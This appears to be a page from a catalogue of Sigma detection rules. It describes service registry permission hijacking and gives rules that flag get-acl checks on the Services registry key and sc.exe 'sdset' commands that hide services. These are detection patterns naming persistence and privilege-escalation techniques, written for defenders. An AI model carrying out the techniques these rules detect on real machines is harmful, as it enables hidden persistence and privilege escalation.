Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.
Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.
Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
view Sigma YAML
title: Service Registry Permissions Weakness Check
id: 95afc12e-3cbb-40c3-9340-84a032e596a3
status: test
description: |
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.
Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.
Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness
- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.4
author: frack113
date: 2021-12-30
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.stealth
- attack.t1574.011
- stp.2a
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- 'get-acl'
- 'REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\'
condition: selection
falsepositives:
- Legitimate administrative script
level: medium
Convert to SIEM query
medium
Service Security Descriptor Tampering Via Sc.EXE
Detection of sc.exe utility adding a new service with special permission which hides that service.
view Sigma YAML
title: Service Security Descriptor Tampering Via Sc.EXE
id: 98c5aeef-32d5-492f-b174-64a691896d25
related:
- id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 # Deny Service Access
type: similar
- id: a537cfc3-4297-4789-92b5-345bfd845ad0 # Specific Technique
type: similar
status: test
description: Detection of sc.exe utility adding a new service with special permission which hides that service.
references:
- https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html
- https://www.sans.org/blog/red-team-tactics-hiding-windows-services/
- https://twitter.com/Alh4zr3d/status/1580925761996828672
- https://twitter.com/0gtweet/status/1628720819537936386
- https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-02-28
tags:
- attack.persistence
- attack.privilege-escalation
- attack.execution
- attack.stealth
- attack.t1574.011
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\sc.exe'
- OriginalFileName: 'sc.exe'
selection_cli:
CommandLine|contains: 'sdset'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
Showing 1101-1150 of 1,492